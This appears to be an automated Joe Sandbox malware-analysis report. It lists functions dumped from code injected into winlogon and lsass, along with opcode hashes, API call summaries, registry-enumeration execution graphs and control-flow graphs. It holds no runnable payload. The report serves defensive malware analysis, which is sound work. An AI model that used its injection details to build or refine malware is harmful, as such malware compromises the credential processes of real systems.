                                                    • Instruction ID: 4d9fb923a024668931dd26515bb1f8222d8a35d90d0c19900a676a0e9de2e7fc
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: 6D31A23124278197E714DF13E84871977E4F744B98F16891EEE9A0778ADB39CA82CF24
                                                    Function 000002E991762058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction ID: d17a5b66f24651ba47f914fd9a9177c7c4c5eae1cb0dd37e5dc1cb50b43e6a1d
                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction Fuzzy Hash: 0DD10132B14AC18AE751CFBAD4483DC3BB1F3547D8F12821ACE5997B9ADA34C486CB51
                                                    Function 000002E9917514A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free
                                                    • String ID:
                                                    • API String ID: 3168794593-0
                                                    • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction ID: 958daf10776be36ad14651f8af9b4503ca9b67d81655b7db465c2faf28d38bcd
                                                    • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction Fuzzy Hash: F4015E32641BD1C6D708DF67E90814A77A0F788FC5F85442AEA4A9371ADF38C091CB91
                                                    Function 000002E991762980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction ID: dea98d673b1eb583a7a563bef56f37ee4aaf8a9f40eb06f1ad15a2b81e6a3132
                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction Fuzzy Hash: BD91C3727546D285F7A09F66D4483AD3BA0F744BC8F56410FDE0AA7A96DB34C4C2CB22
                                                    Function 000002E99175253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction ID: 1f9f842b75453c5857f6b2e56ffc77b939292a8ca7035f958eb5257443a8da6b
                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction Fuzzy Hash: EE71B4362407C2C6E765DF27D8483AA6794F389B84F46042FDE0A53B9ADF35C685CB20
                                                    Function 000002E991729E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CallTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3163161869-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 84d4d0f52c9fe8424e130a51802f206c56cb391b230e05c660d89bf47d82b7fc
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: E6618633601B858AE720DF66D4443AD77B0F348B88F09451AEF4917B99DB38D596CB10
                                                    Function 000002E991752330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction ID: f62a7e3c712747ec3032839da713c06c279082095f181f860e761592c369468b
                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction Fuzzy Hash: 4A51F8326843C3C1E6749A2BE05C36A6B61F385784F56012FDD9A03B5BDB39C984CFA0
                                                    Function 000002E9917626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction ID: 3c3291cdee80793f077ca875b2c93d8f285802d27222ba8780e6ad337528432c
                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction Fuzzy Hash: 8541D532755B8282DB60CF26E8487A977A0F3987D4F92402AEE4DC7785EB3CC481CB51
                                                    Function 000002E9917594A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction ID: 207757b0be7941945bbc5168ef3fd331411ff0e9450000233a5a2120af0f3481
                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction Fuzzy Hash: 01114F32215B8182EB618F16F44435A77E5F788B98F594229EF8C47759EF3CC591CB00
                                                    Function 000002E991727356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                    • API String ID: 592178966-758928094
                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction ID: a257186f3850c7b0ed0a211b5e55a5bcdb9ea12776083c4015b6f529102d0367
                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction Fuzzy Hash: 16E08661681B8990DF018F62E84429833A0EB59B64B499123995C06312FA38D2FAC720
                                                    Function 000002E9917273B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: Locator'$riptor at (
                                                    • API String ID: 592178966-4215709766
                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction ID: 666d30d5e13efd7c2989cd14f499e6fcad5fce96985e36ef4ac7ff9aefadf28a
                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction Fuzzy Hash: CFE0CD61641B89C0DF018F62E44019873A0F759B54F8AD123CD4C07312FB38D2E6C720
                                                    Function 000002E991751BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction ID: d4a5e8aca712c33a79de3256f17f9e0da43bbae3851e7c4569dd7d8c7212e1c3
                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction Fuzzy Hash: FD119125641B8581EA44DB67E40C22973A1FB89FC1F5A402EDE4E93767DF39C482C750
                                                    Function 000002E991751268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction ID: 1436bcb16dbf9b340cef29a2e619caaeb5be8261704b43b7e2ccef2ff9d21f13
                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction Fuzzy Hash: 9EE06D35641645C7EB088F63D80C34A36E1FB89F86F86C028C90987352DF7D84D9CBA1

                                                    Execution Graph

                                                    Execution Coverage:0.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:104
                                                    Total number of Limit Nodes:3
                                                    execution_graph 15336 213bdcb273c 15339 213bdcb276a 15336->15339 15337 213bdcb28d4 15338 213bdcb2858 LoadLibraryA 15338->15339 15339->15337 15339->15338 15340 213bdce1abc 15346 213bdce1628 GetProcessHeap 15340->15346 15342 213bdce1ad2 Sleep SleepEx 15344 213bdce1acb 15342->15344 15344->15342 15345 213bdce1598 StrCmpIW StrCmpW 15344->15345 15391 213bdce18b4 15344->15391 15345->15344 15347 213bdce1648 _invalid_parameter_noinfo 15346->15347 15408 213bdce1268 GetProcessHeap 15347->15408 15349 213bdce1650 15350 213bdce1268 2 API calls 15349->15350 15351 213bdce1661 15350->15351 15352 213bdce1268 2 API calls 15351->15352 15353 213bdce166a 15352->15353 15354 213bdce1268 2 API calls 15353->15354 15355 213bdce1673 15354->15355 15356 213bdce168e RegOpenKeyExW 15355->15356 15357 213bdce16c0 RegOpenKeyExW 15356->15357 15358 213bdce18a6 15356->15358 15359 213bdce16ff RegOpenKeyExW 15357->15359 15360 213bdce16e9 15357->15360 15358->15344 15361 213bdce173a RegOpenKeyExW 15359->15361 15362 213bdce1723 15359->15362 15412 213bdce12bc RegQueryInfoKeyW 15360->15412 15365 213bdce175e 15361->15365 15366 213bdce1775 RegOpenKeyExW 15361->15366 15423 213bdce104c RegQueryInfoKeyW 15362->15423 15369 213bdce12bc 11 API calls 15365->15369 15370 213bdce17b0 RegOpenKeyExW 15366->15370 15371 213bdce1799 15366->15371 15367 213bdce16f5 RegCloseKey 15367->15359 15372 213bdce176b RegCloseKey 15369->15372 15374 213bdce17eb RegOpenKeyExW 15370->15374 15375 213bdce17d4 15370->15375 15373 213bdce12bc 11 API calls 15371->15373 15372->15366 15378 213bdce17a6 RegCloseKey 15373->15378 15376 213bdce180f 15374->15376 15377 213bdce1826 RegOpenKeyExW 15374->15377 15379 213bdce12bc 11 API calls 15375->15379 15380 213bdce104c 4 API calls 15376->15380 15381 213bdce1861 RegOpenKeyExW 15377->15381 15382 213bdce184a 15377->15382 15378->15370 15383 213bdce17e1 RegCloseKey 15379->15383 15384 213bdce181c RegCloseKey 15380->15384 15386 213bdce189c RegCloseKey 15381->15386 15387 213bdce1885 15381->15387 15385 213bdce104c 4 API calls 15382->15385 15383->15374 15384->15377 15388 213bdce1857 RegCloseKey 15385->15388 15386->15358 15389 213bdce104c 4 API calls 15387->15389 15388->15381 15390 213bdce1892 RegCloseKey 15389->15390 15390->15386 15436 213bdce14a4 15391->15436 15429 213bdcf6168 15408->15429 15411 213bdce12ae _invalid_parameter_noinfo 15411->15349 15413 213bdce1327 GetProcessHeap 15412->15413 15416 213bdce148a __free_lconv_num 15412->15416 15418 213bdce133e _invalid_parameter_noinfo __free_lconv_num 15413->15418 15414 213bdce1352 RegEnumValueW 15414->15418 15415 213bdce1476 GetProcessHeap 15415->15416 15416->15367 15418->15414 15418->15415 15419 213bdce141e lstrlenW GetProcessHeap 15418->15419 15420 213bdce13d3 GetProcessHeap 15418->15420 15421 213bdce13f3 GetProcessHeap 15418->15421 15422 213bdce1443 StrCpyW 15418->15422 15431 213bdce152c 15418->15431 15419->15418 15420->15418 15421->15418 15422->15418 15424 213bdce11b5 RegCloseKey 15423->15424 15427 213bdce10bf _invalid_parameter_noinfo __free_lconv_num 15423->15427 15424->15361 15425 213bdce10cf RegEnumValueW 15425->15427 15426 213bdce114e GetProcessHeap 15426->15427 15427->15424 15427->15425 15427->15426 15428 213bdce116e GetProcessHeap 15427->15428 15428->15427 15430 213bdce1283 GetProcessHeap 15429->15430 15430->15411 15432 213bdce1546 15431->15432 15435 213bdce157c 15431->15435 15433 213bdce155d StrCmpIW 15432->15433 15434 213bdce1565 StrCmpW 15432->15434 15432->15435 15433->15432 15434->15432 15435->15418 15437 213bdce14e1 GetProcessHeap 15436->15437 15438 213bdce14c1 GetProcessHeap 15436->15438 15442 213bdcf6180 15437->15442 15439 213bdce14da __free_lconv_num 15438->15439 15439->15437 15439->15438 15443 213bdce14f6 GetProcessHeap HeapFree 15442->15443 15444 213bdce202c 15445 213bdce205d 15444->15445 15446 213bdce213e 15445->15446 15447 213bdce2173 15445->15447 15453 213bdce2081 15445->15453 15448 213bdce21e7 15447->15448 15449 213bdce2178 15447->15449 15448->15446 15452 213bdce2f04 7 API calls 15448->15452 15462 213bdce2f04 GetProcessHeap 15449->15462 15451 213bdce20b9 StrCmpNIW 15451->15453 15452->15446 15453->15446 15453->15451 15455 213bdce1bf4 15453->15455 15456 213bdce1c1b GetProcessHeap 15455->15456 15460 213bdce1c8b __free_lconv_num 15455->15460 15457 213bdce1c41 _invalid_parameter_noinfo 15456->15457 15458 213bdce1c77 GetProcessHeap 15457->15458 15459 213bdce152c 2 API calls 15457->15459 15457->15460 15458->15460 15461 213bdce1c6e 15459->15461 15460->15453 15461->15458 15468 213bdce2f40 _invalid_parameter_noinfo 15462->15468 15463 213bdce3015 GetProcessHeap 15464 213bdce3029 __free_lconv_num 15463->15464 15464->15446 15465 213bdce3010 15465->15463 15466 213bdce2fa2 StrCmpNIW 15466->15468 15467 213bdce1bf4 4 API calls 15467->15468 15468->15463 15468->15465 15468->15466 15468->15467

                                                    Executed Functions

                                                    Function 00000213BDCE202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 213bdce202c-213bdce2057 call 213bdd02d00 2 213bdce205d-213bdce2066 0->2 3 213bdce206f-213bdce2072 2->3 4 213bdce2068-213bdce206c 2->4 5 213bdce2078-213bdce207b 3->5 6 213bdce2223-213bdce2243 3->6 4->3 7 213bdce2081-213bdce2093 5->7 8 213bdce2173-213bdce2176 5->8 7->6 11 213bdce2099-213bdce20a5 7->11 9 213bdce21e7-213bdce21ea 8->9 10 213bdce2178-213bdce2192 call 213bdce2f04 8->10 9->6 15 213bdce21ec-213bdce21ff call 213bdce2f04 9->15 10->6 22 213bdce2198-213bdce21ae 10->22 13 213bdce20a7-213bdce20b7 11->13 14 213bdce20d3-213bdce20de call 213bdce1bbc 11->14 13->14 18 213bdce20b9-213bdce20d1 StrCmpNIW 13->18 23 213bdce20ff-213bdce2111 14->23 25 213bdce20e0-213bdce20f8 call 213bdce1bf4 14->25 15->6 24 213bdce2201-213bdce2209 15->24 18->14 18->23 22->6 28 213bdce21b0-213bdce21cc 22->28 26 213bdce2121-213bdce2123 23->26 27 213bdce2113-213bdce2115 23->27 24->6 29 213bdce220b-213bdce2213 24->29 25->23 40 213bdce20fa-213bdce20fd 25->40 33 213bdce212a 26->33 34 213bdce2125-213bdce2128 26->34 31 213bdce211c-213bdce211f 27->31 32 213bdce2117-213bdce211a 27->32 35 213bdce21d0-213bdce21e3 28->35 36 213bdce2216-213bdce2221 29->36 38 213bdce212d-213bdce2130 31->38 32->38 33->38 34->38 35->35 39 213bdce21e5 35->39 36->6 36->36 41 213bdce2132-213bdce2138 38->41 42 213bdce213e-213bdce2141 38->42 39->6 40->38 41->11 41->42 42->6 43 213bdce2147-213bdce214b 42->43 44 213bdce2162-213bdce216e 43->44 45 213bdce214d-213bdce2150 43->45 44->6 45->6 46 213bdce2156-213bdce215b 45->46 46->43 47 213bdce215d 46->47 47->6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID: S$dialer
                                                    • API String ID: 756756679-3873981283
                                                    • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                    • Instruction ID: 01a705c1139b4e3a3236aaa51ba8ea78d077b3526d5db40ec5641de093292221
                                                    • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                    • Instruction Fuzzy Hash: C951B2B2B1862887EF61CF25D8487EDA3E6F72879CF459021DE0552B85EB36EB51C300
                                                    Function 00000213BDCE328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                    • String ID:
                                                    • API String ID: 1683269324-0
                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction ID: 5d40ba2aa3b61c65a6b29e875bc405932eba3ae14eb689a115a8dbd4c5664118
                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction Fuzzy Hash: 3411E1B161CA0883FF20D720F80DBE92297ABB430EF5001389946451A6FF3BF3488254
                                                    Function 00000213BDCE1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00000213BDCE1628: GetProcessHeap.KERNEL32 ref: 00000213BDCE1633
                                                      • Part of subcall function 00000213BDCE1628: HeapAlloc.KERNEL32 ref: 00000213BDCE1642
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16B2
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16DF
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE16F9
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1719
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1734
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1754
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE176F
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE178F
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE17AA
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17CA
                                                    • Sleep.KERNEL32 ref: 00000213BDCE1AD7
                                                    • SleepEx.KERNELBASE ref: 00000213BDCE1ADD
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE17E5
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1805
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1820
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1840
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE185B
                                                      • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE187B
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1896
                                                      • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE18A0
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061505937.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdce0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1534210851-0
                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction ID: 5c1e5f493c3240c0c1d6ba6cc6eea2f3c80886ee07ec0849ec39ecbda1c65d01
                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction Fuzzy Hash: 2D31F0F120964943FF50DB26DA593E913A6ABA4BCCF0474319E098B695FE36E771C310
                                                    Function 00000213BDCB273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 105 213bdcb273c-213bdcb27a4 call 213bdcb29d4 * 4 114 213bdcb29b2 105->114 115 213bdcb27aa-213bdcb27ad 105->115 116 213bdcb29b4-213bdcb29d0 114->116 115->114 117 213bdcb27b3-213bdcb27b6 115->117 117->114 118 213bdcb27bc-213bdcb27bf 117->118 118->114 119 213bdcb27c5-213bdcb27e6 118->119 119->114 121 213bdcb27ec-213bdcb280c 119->121 122 213bdcb280e-213bdcb2836 121->122 123 213bdcb2838-213bdcb283f 121->123 122->122 122->123 124 213bdcb28df-213bdcb28e6 123->124 125 213bdcb2845-213bdcb2852 123->125 126 213bdcb28ec-213bdcb2901 124->126 127 213bdcb2992-213bdcb29b0 124->127 125->124 128 213bdcb2858-213bdcb286a LoadLibraryA 125->128 126->127 129 213bdcb2907 126->129 127->116 130 213bdcb286c-213bdcb2878 128->130 131 213bdcb28ca-213bdcb28d2 128->131 134 213bdcb290d-213bdcb2921 129->134 135 213bdcb28c5-213bdcb28c8 130->135 131->128 132 213bdcb28d4-213bdcb28d9 131->132 132->124 137 213bdcb2982-213bdcb298c 134->137 138 213bdcb2923-213bdcb2934 134->138 135->131 136 213bdcb287a-213bdcb287d 135->136 142 213bdcb287f-213bdcb28a5 136->142 143 213bdcb28a7-213bdcb28b7 136->143 137->127 137->134 140 213bdcb293f-213bdcb2943 138->140 141 213bdcb2936-213bdcb293d 138->141 145 213bdcb294d-213bdcb2951 140->145 146 213bdcb2945-213bdcb294b 140->146 144 213bdcb2970-213bdcb2980 141->144 147 213bdcb28ba-213bdcb28c1 142->147 143->147 144->137 144->138 148 213bdcb2963-213bdcb2967 145->148 149 213bdcb2953-213bdcb2961 145->149 146->144 147->135 148->144 151 213bdcb2969-213bdcb296c 148->151 149->144 151->144
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000029.00000002.3061237265.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_41_2_213bdcb0000_lsass.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction ID: 62858d15b17bcbc33b2ca6a6066d80486455f950e6546258cbebb37c44571cfa
                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction Fuzzy Hash: AF61E132B4969887EF54CF1590087ADB3A3F764BACF588125DE5D07788EA3ADA53C700

                                                    Non-executed Functions

                                                    Function 00000213BDCE2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
